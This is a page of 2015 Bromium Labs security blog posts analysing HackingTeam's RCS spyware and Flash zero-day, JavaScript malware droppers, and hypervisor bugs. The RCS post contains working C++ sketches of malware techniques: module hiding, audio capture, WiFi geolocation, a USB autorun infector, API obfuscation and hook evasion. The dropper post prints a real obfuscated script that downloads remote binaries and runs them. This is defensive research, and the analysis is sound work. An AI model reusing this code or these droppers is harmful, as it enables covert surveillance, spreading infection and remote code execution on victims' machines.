July 10, 2015 / Nick Cano

Government Grade Malware: a Look at HackingTeam’s RAT


Security researchers the world over have been digging through the massive HackingTeam dump for the past five days, and what we’ve found has been surprising. I’ve heard this situation called many things, and there’s one description that I can definitely agree with: it’s like Christmas for hackers.

“On the fifth day of Christmas Bromium sent to me a malware analysis B-L-O-G” – You

This is a very interesting situation we’ve found ourselves in. We have our hands on the code repositories of HackingTeam, and inside of them we’ve found the source code for a cross-platform, highly-featured, government-grade RAT (Remote Access Trojan). It’s rare that we get to do analysis of complex malware at the source-code level, so I couldn’t wait to write a blog about it!

The first thing I noticed when I dove into the repositories was a bunch of projects for “RCS Agents”, and each of these agents seems to be a malware core for the HackingTeam RAT called Remote Control System, or RCS.


Each of the cores is made for a different OS and, together, they comprise a multi-platform malware that works on Windows, Windows Phone, Windows Mobile, Mac OSX, iOS, Linux, Android, BlackBerry OS, and Symbian. In this blog, I’ll cover the core-win32 repository, but you can assume that the functionality in the Windows agent is present on every other platform.

Background

The code in this repository makes up a 32-bit DLL that is injected system-wide on Windows, enabling the malware to exist in the process space of many potential target applications. There’s also a core-win64 repository that contains the tools to compile this DLL for 64-bit systems.

When the DLL is injected into a process, it will unlink itself from the PEB (Process Environment Block) module list and start an IPC channel to communicate with other instances of the malware and, ultimately, with a root instance that is responsible for talking to the C&C server.
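
To picture the unlinking step, here is a minimal sketch of the general PEB-unlinking technique (my own illustration, not HackingTeam’s code): winternl.h exposes just enough of the loader structures, and this covers only the in-memory-order list.

#include <windows.h>
#include <winternl.h>
#include <intrin.h>

// Walk the loader's in-memory-order module list and unlink our own module so
// that tools enumerating the PEB no longer see it. 32-bit, matching core-win32.
void UnlinkSelfFromPeb(HMODULE hSelf)
{
    PPEB peb = (PPEB)__readfsdword(0x30);   // the PEB pointer lives in the TEB at fs:[0x30]
    PLIST_ENTRY head = &peb->Ldr->InMemoryOrderModuleList;

    for (PLIST_ENTRY e = head->Flink; e != head; e = e->Flink) {
        PLDR_DATA_TABLE_ENTRY entry =
            CONTAINING_RECORD(e, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
        if (entry->DllBase == (PVOID)hSelf) {
            // Unlink from the in-memory-order list; a complete implementation
            // would also unlink the load-order and initialization-order lists.
            e->Blink->Flink = e->Flink;
            e->Flink->Blink = e->Blink;
            break;
        }
    }
}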

Core Functionality

RCS contains dozens of run-of-the-mill spying tools, similar to the ones found in tools like Blackshades and DarkComet. Here’s a look at the source code:


From a quick glance, we can see a number of ‘interesting’ tools:

  • HM_Pstorage.h and HM_PWDAgent (folder): grabs stored passwords from Firefox, Internet Explorer, Opera, Chrome, Thunderbird, Outlook, MSN Messenger, Paltalk, Gtalk, and Trillian.
  • HM_IMAgent.h and HM_IMAgent (folder): records conversations from Skype, Yahoo IM (versions 7 through 10), MSN Messenger (versions 2009 through 2011, now discontinued), and ICQ (version 7 only).
  • HM_SocialAgent.h and Social (folder): grabs session cookies for Gmail, Facebook, Yahoo Mail, Outlook (web client), and Twitter from Firefox, Chrome, and IE.
  • HM_MailCap.h, HM_Contacts.h, HM_MailAgent (folder) and HM_ContactAgent (folder): captures emails and contacts from Outlook and Windows Live Mail.
  • HM_AmbMic.h and HM_MicAgent (folder): records ambient noise picked up by any attached microphones.
  • wcam_grab.h and wcam_grab.cpp: periodically snaps and saves photos from attached webcams.
  • HM_Clipboard.h: grabs any data that is stored on the clipboard.
  • HM_KeyLog.h: logs all keystrokes.
  • HM_MouseLog.h: logs all mouse movements and clicks.
  • HM_UrlLog.h: records visited URLs in Firefox, Chrome, IE, and Opera.

There’s nothing really novel in the code, and the methods mostly utilize standard API calls. This functionality is pretty common in most RATs, but we should consider that most of these files were checked into the repository as early as 2011, meaning RCS may have pioneered some of these features.

Some closer analysis of the code reveals that RCS does have some rarer features, though. In HM_SkypeRecord.h and HM_SkypeACL (folder), for instance, we can see that they use the DirectSound API to capture active Skype calls and save the audio using the Speex codec.
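
For context, plain DirectSound capture looks roughly like this. This is a generic microphone sketch against the public API – not RCS’s in-process Skype hook – with the Speex encoding step left out and error handling trimmed:

#include <windows.h>
#include <dsound.h>
#include <cstring>
#pragma comment(lib, "dsound.lib")

// Capture `bytes` of 16 kHz mono PCM from the default capture device.
bool CapturePcm(BYTE *out, DWORD bytes)
{
    LPDIRECTSOUNDCAPTURE dsc = NULL;
    if (FAILED(DirectSoundCaptureCreate(NULL, &dsc, NULL))) return false;

    WAVEFORMATEX wfx = { WAVE_FORMAT_PCM, 1, 16000, 32000, 2, 16, 0 };
    DSCBUFFERDESC desc = {};
    desc.dwSize        = sizeof(desc);
    desc.dwBufferBytes = bytes;
    desc.lpwfxFormat   = &wfx;

    LPDIRECTSOUNDCAPTUREBUFFER buf = NULL;
    if (FAILED(dsc->CreateCaptureBuffer(&desc, &buf, NULL))) return false;

    buf->Start(DSCBSTART_LOOPING);
    Sleep(1000 * bytes / wfx.nAvgBytesPerSec + 100);  // crude: let the buffer fill once
    buf->Stop();

    void *p1, *p2; DWORD n1, n2;
    if (FAILED(buf->Lock(0, bytes, &p1, &n1, &p2, &n2, 0))) return false;
    memcpy(out, p1, n1);
    if (p2) memcpy(out + n1, p2, n2);
    buf->Unlock(p1, n1, p2, n2);
    buf->Release(); dsc->Release();
    return true;
}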


Additionally, we see that RCS can monitor printed documents (HM_PrintPool.h) and even grab private keys, balances, and transactions from Bitcoin, Litecoin, Feathercoin, and Namecoin wallets (HM_Money.h).


Luckily for us Shibe fans, they don’t seem to monitor Dogecoin wallets.

Geolocation

RCS uses the WLAN (wireless LAN) API functions from WLANAPI.DLL to enumerate nearby WiFi hotspots. Many hotspots expose geolocation information and RCS looks for this information so it can determine where the infected machine is, even when it is hiding behind a VPN or proxy.
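
A minimal sketch of that enumeration against the documented WLANAPI.DLL surface (error handling trimmed; a real collector would also call WlanScan first, and would then submit the BSSID/signal pairs to a WiFi geolocation service):

#include <windows.h>
#include <wlanapi.h>
#include <stdio.h>
#pragma comment(lib, "wlanapi.lib")

int main()
{
    HANDLE client = NULL;
    DWORD version = 0;
    if (WlanOpenHandle(2, NULL, &version, &client) != ERROR_SUCCESS)
        return 1;

    PWLAN_INTERFACE_INFO_LIST ifaces = NULL;
    if (WlanEnumInterfaces(client, NULL, &ifaces) == ERROR_SUCCESS) {
        for (DWORD i = 0; i < ifaces->dwNumberOfItems; i++) {
            PWLAN_BSS_LIST bssList = NULL;
            if (WlanGetNetworkBssList(client, &ifaces->InterfaceInfo[i].InterfaceGuid,
                                      NULL, dot11_BSS_type_any, FALSE, NULL,
                                      &bssList) == ERROR_SUCCESS) {
                // Each BSSID plus its signal strength is one data point for geolocation.
                for (DWORD j = 0; j < bssList->dwNumberOfItems; j++) {
                    const WLAN_BSS_ENTRY &e = bssList->wlanBssEntries[j];
                    printf("%02x:%02x:%02x:%02x:%02x:%02x rssi=%ld\n",
                           e.dot11Bssid[0], e.dot11Bssid[1], e.dot11Bssid[2],
                           e.dot11Bssid[3], e.dot11Bssid[4], e.dot11Bssid[5],
                           e.lRssi);
                }
                WlanFreeMemory(bssList);
            }
        }
        WlanFreeMemory(ifaces);
    }
    WlanCloseHandle(client, NULL);
    return 0;
}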


Lateral Movement

Since HackingTeam seems to have a stockpile of 0days for lateral movement, you would think RCS wouldn’t employ any features with that specific purpose. You’d be wrong, though. They seem to have an infector that can infect USB drives, phones running Windows Mobile, and VMWare disks. This infector is located in HM_PDAAgent.h.

The USB infector is pretty standard. RCS polls for new USB drives, drops an installer on them, and infects the autorun.inf file to run that installer.
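
The logic is simple enough to sketch in a few lines (illustrative only – “installer.exe” is a placeholder name, not the RCS dropper, and modern Windows versions ignore autorun.inf on removable media):

#include <windows.h>
#include <fstream>
#include <string>

// Poll the drive mask, and for every removable volume drop an installer plus
// an autorun.inf pointing at it (a sketch of the classic technique).
void InfectRemovableDrives()
{
    DWORD mask = GetLogicalDrives();
    for (char letter = 'A'; letter <= 'Z'; ++letter) {
        if (!(mask & (1u << (letter - 'A')))) continue;
        std::string root = std::string(1, letter) + ":\\";
        if (GetDriveTypeA(root.c_str()) != DRIVE_REMOVABLE) continue;

        CopyFileA("installer.exe", (root + "installer.exe").c_str(), FALSE);
        std::ofstream inf(root + "autorun.inf");
        inf << "[autorun]\r\n"
               "open=installer.exe\r\n"
               "action=Open folder to view files\r\n";
    }
}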


The Windows Mobile infector works in much the same way, copying the malware from the core-winmobile repository to the phone as a file called autorun.exe. Afterwards, it drops an infected autorun.zoo file on the phone. All of this is done using functions from RAPI.DLL, the standard Remote API for Windows Mobile devices.


The VMWare installer is a bit trickier. First, it will search for any VMWare disks (.vmdk) that aren’t in use. When it finds one, it will mount it to an open drive letter and then drop an RCS installer in either C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ (Windows 7 and above) or C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ (Windows XP). This code is a bit too bulky to post, but it starts on line 731 of HM_PDAAgent.h, in case you get your hands on the code and want to take a look.

Self-Protection

RCS has a myriad of self-protection mechanisms, including AV detection, API call obfuscation, and API hook evasion. For starters, the AV detection is capable of detecting twenty-six different AV tools. Here’s a snippet from av_detect.h:


RCS detects these AVs either by looking for their drivers or checking the environment for certain variables. It’s smart enough to know which of its features will trigger alerts with which AVs, and will selectively disable features to remain hidden.


The malware also uses obfuscated API calls to prevent any form of static analysis from understanding what it is doing. In the file DynamiCall\obfuscated_calls.h, the malware has encoded strings that represent DLL names and API function names that it calls.
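
The pattern looks roughly like this (a toy reconstruction; the XOR key and the encoded byte arrays below are my own illustration, not RCS’s actual encoding scheme):

#include <windows.h>
#include <string>

// Decode an XOR-obfuscated string just before use, so the plaintext API name
// never appears in the binary's string table.
static std::string Decode(const char *enc, size_t len, char key)
{
    std::string out(enc, len);
    for (char &c : out) c ^= key;
    return out;
}

typedef LPVOID (WINAPI *VirtualAllocEx_t)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD);

VirtualAllocEx_t ResolveVirtualAllocEx()
{
    // "kernel32.dll" and "VirtualAllocEx", each XOR-encoded with the key 0x5A
    // (an illustrative key, not the one RCS uses).
    static const char dll[] = { 0x31,0x3f,0x28,0x34,0x3f,0x36,0x69,0x68,
                                0x74,0x3e,0x36,0x36 };
    static const char fn[]  = { 0x0c,0x33,0x28,0x2e,0x2f,0x3b,0x36,0x1b,
                                0x36,0x36,0x35,0x39,0x1f,0x22 };
    HMODULE mod = LoadLibraryA(Decode(dll, sizeof(dll), 0x5A).c_str());
    if (!mod) return NULL;
    return (VirtualAllocEx_t)GetProcAddress(mod, Decode(fn, sizeof(fn), 0x5A).c_str());
}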


From there, DynamiCall\dynamic_import.h and DynamiCall\dynamic_import.cpp take care of decoding the strings, loading the DLLs, and resolving the addresses of the functions.

Additionally, RCS has a set of API functions that it will only call if it can confirm that they aren’t being monitored: ReadProcessMemory, WriteProcessMemory, CreateRemoteThread, CreateThread, GetProcAddress, VirtualAllocEx, GetWindowText, SendMessageTimeout, and VirtualProtectEx. Every time one of these functions is called, RCS will grab the DLL that contains the function, manual-map it into memory, locate the target function in the manually-mapped library, and copy the first five bytes from the manually-mapped library over the first five bytes of the function in the actual library. If any step in this process fails, the malware will not call the function. The code that does this is pretty bulky, but you can find it in HM_SafeProcedures.h, HM_SafeProcedures.cpp, HM_PreamblePatch.h, and HM_PreamblePatch.cpp.
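
The hook-evasion idea can be sketched briefly. Below is a rough reconstruction under one simplifying assumption of mine – mapping a clean image view of the DLL with SEC_IMAGE instead of writing a full manual mapper – so it captures the spirit of the technique rather than RCS’s implementation:

#include <windows.h>
#include <cstring>

// Exports sit at the same RVA in both views, so the pristine prologue can be
// located by offset and copied over the (possibly hooked) live function.
bool RestorePreamble(const char *dllPath, const char *dllName, const char *func)
{
    HMODULE live = GetModuleHandleA(dllName);
    BYTE *hooked = live ? (BYTE *)GetProcAddress(live, func) : NULL;
    if (!hooked) return false;

    HANDLE file = CreateFileA(dllPath, GENERIC_READ, FILE_SHARE_READ,
                              NULL, OPEN_EXISTING, 0, NULL);
    if (file == INVALID_HANDLE_VALUE) return false;
    HANDLE map = CreateFileMappingA(file, NULL, PAGE_READONLY | SEC_IMAGE,
                                    0, 0, NULL);
    BYTE *clean = map ? (BYTE *)MapViewOfFile(map, FILE_MAP_READ, 0, 0, 0) : NULL;

    bool ok = false;
    if (clean) {
        BYTE *pristine = clean + (hooked - (BYTE *)live);  // same RVA in both mappings
        DWORD old;
        if (VirtualProtect(hooked, 5, PAGE_EXECUTE_READWRITE, &old)) {
            memcpy(hooked, pristine, 5);  // stomp any inline JMP hook
            VirtualProtect(hooked, 5, old, &old);
            ok = true;
        }
        UnmapViewOfFile(clean);
    }
    if (map) CloseHandle(map);
    CloseHandle(file);
    return ok;
}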

One of the most telling pieces of code in the malware, though, is an unfinished snippet starting on line 48 of format_resistant.cpp, which suggests the team was developing a way for RCS to persist through UEFI infection. Though the code is unfinished, it is telling of their future ambitions.

Note: Other repositories also contain some kernel-mode rootkits to hide the malware, but this blog is already getting pretty beefy.

Closing Thoughts

HackingTeam’s RCS is a fully-featured RAT with the ability to intercept large amounts of personal information, record conversations, access cameras, propagate to peripheral devices, and do it all without triggering any alarms. The source code shows that the malware was developed by a very ambitious team, and the repository logs make it clear that it was under active development. The implications this carries are huge, especially considering HackingTeam’s customer list.

July 7, 2015 / Nick Cano

Adobe Flash Zero Day Vulnerability Exposed to Public

For those paying attention to infosec news, it’s no secret that HackingTeam – a provider of exploits and malware to governments around the world – has been hacked. The hackers who hacked the hackers released a torrent with over 400GB of internal HackingTeam software, tools, write-ups, and, of course, 0-day exploits. One of the exploits we’ve come across was first exposed by the Twitter user @w3bd3vil, and is reminiscent of the “ActionScript-Spray” attack used in CVE-2014-0322 and first documented by Bromium researcher Vadim Kotov. In summary, CVE-2014-0322 used a UAF (use after free) vulnerability in Microsoft’s Internet Explorer to increase the size of an ActionScript Vector object, giving the attacker access to the heap of the process. HackingTeam’s exploit uses this idea to achieve execution, but uses a UAF bug internal to the ActionScript 3 engine.

Note: before diving in, let’s remember that this is not a weaponized 0day, but a PoC that HackingTeam provided to customers, so we don’t have any malicious payload to accompany it; only a simple calc.exe pop.

The UAF vulnerability is quite simple. First, it sprays the heap with multiple ByteArray objects and surrounds each one with MyClass2 objects.

[Figure: Spraying ByteArray and MyClass2 instances into memory]

This loop iterates 30 times, effectively filling up the Array object a like so:

for i = 1 to 30:
    a.insert(MyClass2 instance)
    a.insert(ByteArray with length 0xfa0 [4000 bytes])
    a.insert(MyClass2 instance)

This spray strategically allocates a chunk of two sequential pages next to each ByteArray object, setting up ActionScript’s memory manager for exploitation. Before I dive into the code that does the exploitation, I want to give you a 10,000-foot view of how the exploit works. When a class instance is placed inside of a ByteArray, ActionScript will attempt to call the class’ member function .valueOf(), which is expected to return the actual byte to insert into the ByteArray; this is where the magic happens. ActionScript internally stores the location of the target ByteArray slot before calling .valueOf(), and it places the returned value at the stored location.

In order to exploit this behavior, the attack resizes the target ByteArray from inside of .valueOf(). This causes a new chunk of memory to be allocated for the ByteArray object, freeing the old memory. Before returning, .valueOf() allocates a Vector that matches the size of the old ByteArray object. With a bit of luck (hence the 30 tries), the memory manager places the new Vector object on the freed memory from the old ByteArray. Then, when .valueOf() returns, ActionScript will write the return value directly to the length field of the new Vector.

The attack iterates backwards over the sprayed ByteArray objects in a, and attempts to trigger the UAF on each one using this method. Here’s what the implementation looks like:

[Figure: Attempting to trigger the vulnerability condition on the sprayed ByteArray objects]

After .valueOf() returns and the ByteArray is updated, the attack loops over the list of Vector objects that it allocated (stored in _va) and checks their size. If any Vector has a size that is not 0x3f0, it means that the exploit succeeded in partially overwriting the size with the byte 0x40.

[Figure: Checking the newly-allocated Vector objects to see if one was affected by the exploit]

From there, the attack uses the same method that was used to write the payload in CVE-2014-0322. The attack treats the affected Vector as a pointer to the entire memory space of the program (well, not the entire memory, but all memory following the Vector). It uses this to scan memory for the PE header of KERNEL32.DLL and grabs the address of VirtualProtect from the export table. Next, it overwrites the VFT (virtual function table) of an internal class with the address of VirtualProtect, and calls the function to set the memory of the MyClass2 instance directly after the affected Vector to PAGE_EXECUTE_READWRITE. With the MyClass2 memory set to executable, the attack finishes by finally placing its shellcode payload within the MyClass2 instance and using the same VFT trick to execute it.

Out of the box, this exploit comes with shellcode for Windows (both 32 and 64 bit) and Mac OSX (64 bit only). According to the documentation present in the dump, this exploit should work with every version of Flash Player from version 9 until 18.0.0.194. We’ve got it working internally with Flash Player 18 and Internet Explorer, which indicates it is clearly a zero-day risk to internet users today. Given legitimately sophisticated shellcode and mitigation bypass techniques similar to the ones documented by Bromium researcher Jared DeMott, this exploit has the potential to completely own almost any system it hits, though it can be reliably blocked by leveraging robust isolation technologies.

UPDATE 7/8/2015: It seems like Adobe has already released a patch for this vulnerability, and Flash Player versions 18.0.0.203 and above should be protected.

June 12, 2015 / Vadim Kotov

Oh look – JavaScript Droppers

In a typical drive-by-download attack scenario the shellcode would download and execute a malware binary. The malware binary is usually wrapped in a dropper that unpacks or de-obfuscates and executes it. Droppers’ main goal is to launch malware without being detected by antiviruses and HIPS. Nowadays the most popular way of covert launching is probably process hollowing. Recently we found a couple of curious specimens that do not follow this fashion. These cases are not new, but we thought they’re worth mentioning because we’ve been seeing quite a few of them lately. One of them is the shellcode from an Internet Explorer exploit, which instead of downloading a binary executes the following CMD command:

Windows/syswow64/cmd.exe cmd.exe /q /c cd /d "%tmp%" && echo var w=g("WScript.Shell"),a=g("Scripting.FileSystemObject"),w1=WScript;try{m=w1.Arguments;u=600;o="***";w1.Sleep(u*u);var n=h(m(2),m(1),m(0));if (n.indexOf(o)^>3){k=n.split(o);l=k[1].split(";");for (var i=0;i^<l.length;i++){v=h(m(2),l[i],k[0]);z=0;var s=g("\x41\x44\x4f\x44\x42\x2e\x53\x74\x72\x65\x61\x6d");f=a.GetTempName();s.Type=2;s.Charset="iso-8859-1";s.Open();d=v.charCodeAt(v.indexOf("PE\x00\x00")+23);x1=".\x65x\x65";s.WriteText(v);if(31^<d){z=1;f+=".dll"}else f+=x1;s.SaveToFile(f,2);z^&^&(f="regsvr32"+x1+" /s "+f);s.Close();w.run("cmd"+x1+" /c "+f,0);w1.Sleep(u*2)}}}catch(q){}df();function r(k,e){for(var l=0,n,c=[],q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e.charCodeAt(b%e.length)^&255,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&255,l=l+c[b]^&255,n=c[b],c[b]=c[l],c[l]=n,q.push(String.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&255]));return q.join("")}function su(k,e){k.setRequestHeader("User-Agent",e)}function h(k,y,j){var e=g("WinHttp.WinHttpRequest.5.1");e.SetProxy(0);e.Open("\x47E\x54",y,0);su(e,k);e.Send();if(200==e.status)return r(e.responseText,j)}function df(){a.deleteFile(w1.ScriptFullName)}function g(k){return new ActiveXObject(k)};>wtm.js && start wscript //B wtm.js "y0fz0r5qF2MT" "hxxp://mediafilled.com/?utm_source=48853" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

It’s actually a one liner that creates a JavaScript file and launches it using wscript. The de-obfuscated JavaScript code looks like this:


var w = new ActiveXObject("WScript.Shell"),
    a = new ActiveXObject("Scripting.FileSystemObject");

try {
    rc4_key = WScript.Arguments(0)
    URL = WScript.Arguments(1)
    user_agent_string = WScript.Arguments(2)

    separator = "***";

    WScript.Sleep(360000);

    var n = request_and_decrypt(user_agent_string, URL, rc4_key);

    if (n.indexOf(separator) > 3) {
        k = n.split(separator);
        l = k[1].split(";");

        for (var i = 0; i < l.length; i++) {
            v = request_and_decrypt(user_agent_string, l[i], k[0]);
            is_dll = 0;
            var s = new ActiveXObject('ADODB.Stream');
            filename = a.GetTempName();
            s.Type = 2;
            s.Charset = "iso-8859-1";
            s.Open();

            pe_characteristics = v.charCodeAt(v.indexOf("PE\x00\x00") + 23);
            s.WriteText(v);

            if (31 < pe_characteristics) {
                is_dll = 1;
                filename += ".dll"
            } else {
                filename += ".exe";
            }

            s.SaveToFile(filename, 2);

            if(is_dll)
                filename = "regsvr32.exe /s " + filename);

            s.Close();

            w.run("cmd.exe /c " + filename, 0);

            WScript.Sleep(1200)

        }

    }

} catch (q) {}


a.deleteFile(WScript.ScriptFullName)


function RC4_decrypt(k, e) {
    for (var l = 0, n, c = [], q = [], b = 0; 256 > b; b++)c[b] = b;

    for (b = 0; 256 > b; b++) l = l + c[b] + e.charCodeAt(b % e.length) & 255, n = c[b], c[b] = c[l], c[l] = n;

    for (var p = l = b = 0; p < k.length; p++) b = b + 1 & 255, l = l + c[b] & 255, n = c[b], c[b] = c[l], c[l] = n, q.push(String.fromCharCode(k.charCodeAt(p) ^ c[c[b] + c[l] & 255]));

    return q.join("")

}



function request_and_decrypt(user_agent_string, URL, rc4_key) {

    var request = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
    request.SetProxy(0);
    request.Open("GET", URL, 0);
    request.setRequestHeader("User-Agent", user_agent_string)
    request.Send();

    if (200 == request.status)
        return RC4_decrypt(request.responseText, rc4_key)

}

After a 6-minute sleep, the script downloads an RC4-encrypted text file containing the URLs of malware binaries. It decrypts the list and, for each entry, downloads, decrypts and executes the corresponding binary. The same RC4 key is used for all the downloads. Before launching a binary, it checks the PE header to determine if it’s an EXE or a DLL. In the former case it will issue:

cmd.exe /c <tempname>.exe

in the latter:

regsvr32.exe /s <tempname>.dll

After that the script will delete itself. We could assume certain benefits of this approach:

  1. It might trick some HIPS or pro-active AV modules
  2. The binaries are encrypted – therefore the chances of network detection are slim
  3. The URLs of malicious binaries are not hardcoded – they are easily configurable

Interestingly, we saw a similar dropper in an EXE as well. A fake Flash Player installer from hxxp://twitclh.tv/berterofficial/v/5474368/ is an EXE that shows clean on VirusTotal (permalink). It creates a JavaScript file and a batch script. Here’s the de-obfuscated JavaScript:


(function(c) {
    function a(a, b) {
        if (!b || !a) return null;
        b = e["ExpandEnvironmentStrings"](b);
        var d = WScript.CreateObject("Msxml2.XMLhttp");
        d.open("GET", a, !1);
        d.send(null);
        var c = new ActiveXObject("ADODB.Stream");
        with(c) return Mode = 3, Type = 1, Open(), Write(d["responseBody"]), SaveToFile(b, 2), Close(), b
    }

    fso = new ActiveXObject("Scripting.FileSystemObject");
    var e = new ActiveXObject("WScript.Shell");
    c = new ActiveXObject("Shell.Application" );
    FileDestr = e["ExpandEnvironmentStrings"]("%APPDATA%\\");

    a("https://copy.com/kH0joqRbalvYJHgV", "%APPDATA%\\7winzip.exe");
    a("https://copy.com/ZNkwaUExZCdlxsXV", "%APPDATA%\\wilndfiles");
    a("https://copy.com/sWvTey97XnV3R87g", "%APPDATA%\\wilndfile.cmd");
    a("https://copy.com/OXqMLsoKtDXcrQp0", "%APPDATA%\\wilndfiler.cmd");

    c.ShellExecute("cmd.exe", '/c"' + FileDestr + 'wilndfile.cmd"', "", "runas", 0);
    c.ShellExecute("cmd.exe", '/c"' + FileDestr + 'wilndfiler.cmd"', "", "runas", 0);

})(this);

It downloads 4 files from copy.com; notice that these are HTTPS connections, again rendering traffic filters useless. The files are:

  1. 7winzip.exe – an instance of 7zip
  2. wilndfiles – a password-protected 7z archive
  3. wilndfile.cmd – a batch script
  4. wilndfiler.cmd – a batch script

After that it executes both scripts: the first one unpacks the archive and launches the malware, the second cleans up all the dropper-related files. Is this method more beneficial than more traditional droppers? It appears so. Instead of making more sophisticated PE droppers, it seems rational to just switch to JavaScript and use the PE as a “dropper” for JavaScript. Given 0 positives on VirusTotal, it seems antiviruses do not scrutinize these files too well. Of course, VirusTotal doesn’t do justice to the antiviruses: some of them have HIPS modules and various heuristics and could possibly detect it. But still, none of them had a signature for this dropper, not even a generic one, and that should be alarming.

May 13, 2015 / Jared DeMott

The Floppies Won’t Eat Your Mouse

We heard tell of a mean ol’ venom on the street (CVE-2015-3456).  “Hey, give that back to Spidey.”


So we decided to have a look.  But we’re not talking about superheroes.  We’re talking about floppy.  Remember this fella?

[Image: a floppy disk]

He seems bummed out.  That’s because there’s not much need for him anymore.  Or so we thought.  Let’s give it over to the expert:


“Thank you Captain.  Indeed certain hypervisors may still include code, which enables the use of this primitive alien technology, known as the “floppy”.  As expected, federation level technologies (Bromium) removed such useless code to begin with.  (E.g. vSentry is not at all vulnerable.)

The source code file that holds the vulnerability is fdc.c.  Here is the detailed code flaw and fix:

http://xenbits.xen.org/xsa/xsa133-qemut.patch

Though it has not been observed, it appears that rogues with system-level privileges in a VM could escape to the host, if the vulnerable code were compiled in. Estimating impact is non-trivial as always. Most of the risk is in the cloud, and details about the exact compiled version of each provider’s hypervisor are unlikely to surface. Either way, providers will react to this threat quickly. Thus, real-world impact is not expected at this time.”

Now back to our regularly scheduled program.

P.S. This bug was found by Jason Geffner – Great job!

April 1, 2015 / Nick Cano

The ABC’s of APT

Here at Bromium Labs, we’re always striving to further our knowledge of the rapidly-changing attack landscape that threatens our enterprise customers. Over the past few months, our dedicated team of researchers have collectively developed a severe chemical dependency on caffeine in search of a paradigm to clearly define this landscape in a way that could benefit the security community as a whole. What they came up with is truly groundbreaking, and will go down in history as “The ABC’s of APT.”

[Image: The ABC’s of APT – CopyWronged© by Bromium Labs]

As we all know, the term APT refers to an “Advanced Persistent Threat.” In our research, we realized each APT has unique behavior, and casting them all under one umbrella can be a slippery slope towards people marrying their television sets. For this reason, we devised our own paradigm that strips the broad term “APT” from threat diagnoses and, instead, categorizes them using a more specialized spectrum. Surprisingly, this spectrum happens to encompass twenty-six distinct behaviors – each of which can be represented using one letter of the alphabet. And, thus, The ABC’s of APT were born. Without further blabbering, here’s our finished diagnosis table:

Read more…

March 12, 2015 / Vadim Kotov

Achievement Locked: New Crypto-Ransomware Pwns Video Gamers

Gamers may be used to paying to unlock downloadable content in their favorite games, but a new crypto-ransomware variant aims to make gamers pay to unlock what they already own. Data files for more than 20 games can be affected by the threat, increasing what is already a large target for cybercriminals. Another file type that hasn’t been targeted before is iTunes-related. But first, let’s have a look at the initial infection.

Read more…

March 10, 2015 / Rafal Wojtczuk

The five Xen Security Advisories from March 2015 and Bromium vSentry

Five Xen hypervisor security advisories – XSA-120, XSA-121, XSA-122, XSA-123 and XSA-124 – have been published recently. Let’s have a look at how they relate to the Bromium vSentry hypervisor, uXen, which has been derived from Xen.

Summary of impact on uXen

XSA-120 – not vulnerable
XSA-121 – minor data disclosure
XSA-122 – minor data disclosure
XSA-123 – not vulnerable
XSA-124 – not vulnerable

XSA-120 and XSA-124

These vulnerabilities are related to PCI-passthrough functionality. If a malicious VM has been granted direct access to a PCI device, it can crash the host. Currently, in Bromium vSentry we do not pass any PCI devices to any VM, therefore these vulnerabilities are not relevant.

XSA-121

The code responsible for emulation of some hardware (e.g. real-time clock, interrupt controller) refuses to handle unexpected requests from the VM. Unfortunately, the upper layers of the emulator still return 4 bytes of uninitialized data to the VM, despite the fact that this location has not been filled by the lower layer of the code. This results in a limited information disclosure – four bytes from the hypervisor address space are disclosed to the VM. These four bytes reside in the hypervisor stack. Therefore, the impact is minimal – the only information useful for an attacker is the partial value of pointers residing on the stack. This is not interesting by itself, but it might be helpful when exploiting another (unrelated) vulnerability based on memory corruption, because it makes ASLR protection ineffective.
uXen is potentially vulnerable to this issue.

XSA-122

This issue is very similar to XSA-121. This time, limited information disclosure of the contents of the hypervisor’s stack occurs when handling the “xen_version” hypercall. The impact is also identical to XSA-121 (the difference is that more than 4 bytes can be disclosed).
uXen is potentially vulnerable to this issue.

XSA-123

This is the most interesting one of the five, because it is a hypervisor memory corruption. The discoverer’s analysis is here; the below independent analysis is essentially the same, with a few extra bits on the CPU0 case.
The vulnerability lies in the code responsible for instruction emulation. The Xen emulator maintains the following data structure (C union):
union {
    /* OP_REG: Pointer to register field. */
    unsigned long *reg;
    /* OP_MEM: Segment and offset. */
    struct { enum x86_segment seg; unsigned long off; } mem;
};

If the instruction accesses memory, then the “mem” field of the union should be used. If the instruction accesses a register, then the “reg” pointer should be used – it points to the stored register on the hypervisor stack. The problem arises when Xen emulates an instruction that does not access memory, but is prefixed by the segment override prefix (naturally, such a combination does not make sense). In such a case, the “reg” pointer is first initialized to a legal location, but then the “mem.seg” field is also written to. As both fields (“reg” and “seg”) share the same location (this is how C unions work), the result is that the “reg” pointer is corrupted. Subsequently, this pointer is read from or written to with a controllable value.
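
To make the overlap concrete, here is a toy user-space model of the corruption (illustrative C++, not Xen code; reading the other union member after the write is formally undefined behavior, but it mirrors what effectively happens in the emulator):

#include <cstdio>

// The 4-byte enum write lands on the low half of the 8-byte pointer that
// shares its storage. Segment order is illustrative; what matters is gs == 5.
enum x86_segment { x86_seg_cs, x86_seg_ss, x86_seg_ds,
                   x86_seg_es, x86_seg_fs, x86_seg_gs };

union operand {
    unsigned long *reg;                                   /* OP_REG */
    struct { x86_segment seg; unsigned long off; } mem;   /* OP_MEM */
};

int main()
{
    unsigned long fake_reg = 0;
    operand op;
    op.reg = &fake_reg;        // initialized to a legal "stack" location
    op.mem.seg = x86_seg_gs;   // the segment-override path then writes seg = 5...
    // ...so op.reg is now 0xXXXXXXXX00000005: high half intact, low half 0-5.
    std::printf("corrupted reg = %p\n", (void *)op.reg);
    return 0;
}
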
